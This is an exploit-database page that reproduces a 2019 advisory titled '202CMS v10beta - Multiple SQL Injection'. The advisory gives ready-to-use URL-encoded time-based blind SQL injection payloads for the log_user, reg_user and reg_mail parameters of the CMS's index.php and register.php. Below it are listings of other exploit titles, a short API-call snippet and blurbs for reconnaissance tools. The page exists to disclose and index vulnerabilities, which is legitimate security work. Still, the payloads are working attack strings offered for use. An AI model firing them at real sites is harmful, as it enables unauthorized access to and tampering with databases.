Search for hundreds of thousands of exploits

"202CMS v10beta - Multiple SQL Injection"

Author

Exploit author

"Mehmet EMIROGLU"

Platform

Exploit platform

php

Release date

Exploit published date

2019-03-20

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
===========================================================================================
# Exploit Title: 202CMS - 'log_user' SQL Inj.
# Dork: N/A
# Date: 20-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/b202cms/
# Software Link: https://sourceforge.net/projects/b202cms/
# Version: v10 beta
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: 202CMS is small, but functionally CMS. It is based
on Twitter Bootstrap
  This CMS was built by Konrad and is powered by MySQLi and PHP. 202CMS is
highly customizable
  and extremely easy to setup. The script is not finished, but soon I'm
going to finish it.
===========================================================================================
# POC - SQLi (blind)
# Parameters : log_user
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# POST Method : http://localhost/202cms10beta/index.php
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: 202CMS - 'register.php' SQL Inj.
# Dork: N/A
# Date: 20-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/b202cms/
# Software Link: https://sourceforge.net/projects/b202cms/
# Version: v10 beta
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: 202CMS is small, but functionally CMS. It is based
on Twitter Bootstrap
  This CMS was built by Konrad and is powered by MySQLi and PHP. 202CMS is
highly customizable
  and extremely easy to setup. The script is not finished, but soon I'm
going to finish it.
===========================================================================================
# POC - SQLi (blind)
# Parameters : register.php, reg_user,reg_mail
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# Attack Pattern : %27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27
# POST Method : http://localhost/202cms10beta/register.php
===========================================================================================
Release DateTitleTypePlatformAuthor
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
Release DateTitleTypePlatformAuthor
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-26"OpenEMR 5.0.1 - Remote Code Execution"webappsphp"Musyoka Ian"
Release DateTitleTypePlatformAuthor
2019-07-08"Karenderia Multiple Restaurant System 5.3 - SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-07-05"Karenderia Multiple Restaurant System 5.3 - Local File Inclusion"webappsphp"Mehmet EMIROGLU"
2019-07-01"WorkSuite PRM 2.4 - 'password' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-07-01"Varient 1.6.1 - SQL Injection"webappsmultiple"Mehmet EMIROGLU"
2019-07-01"CiuisCRM 1.6 - 'eventType' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-05-16"DeepSound 1.0.4 - SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-05-14"Sales ERP 8.1 - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-05-14"PasteShr 1.6 - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-28"Job Portal 3.1 - 'job_submit' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-28"BigTree 4.3.4 CMS - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-20"202CMS v10beta - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-19"eNdonesia Portal 8.7 - Multiple Vulnerabilities"webappsphp"Mehmet EMIROGLU"
2019-03-18"TheCarProject v2 - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-15"Laundry CMS - Multiple Vulnerabilities"webappsphp"Mehmet EMIROGLU"
2019-03-15"ICE HRM 23.0 - Multiple Vulnerabilities"webappsphp"Mehmet EMIROGLU"
2019-03-07"Kados R10 GreenBee - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-05"OpenDocMan 1.3.4 - 'search.php where' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-20"HotelDruid 2.3 - Cross-Site Scripting"webappsphp"Mehmet EMIROGLU"
2019-02-18"qdPM 9.1 - 'search[keywords]' Cross-Site Scripting"webappsphp"Mehmet EMIROGLU"
2019-02-18"qdPM 9.1 - 'type' Cross-Site Scripting"webappsphp"Mehmet EMIROGLU"
2019-02-18"Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload"webappsphp"Mehmet EMIROGLU"
2019-02-15"qdPM 9.1 - 'search_by_extrafields[]' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-13"PilusCart 1.4.1 - 'send' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-13"Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting"webappsphp"Mehmet EMIROGLU"
2019-02-11"Webiness Inventory 2.3 - 'email' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-06"osCommerce 2.3.4.1 - 'reviews_id' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-06"osCommerce 2.3.4.1 - 'products_id' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-06"osCommerce 2.3.4.1 - 'currency' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-04"SuiteCRM 7.10.7 - 'parentTab' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-04"SuiteCRM 7.10.7 - 'record' SQL Injection"webappsphp"Mehmet EMIROGLU"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46579/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.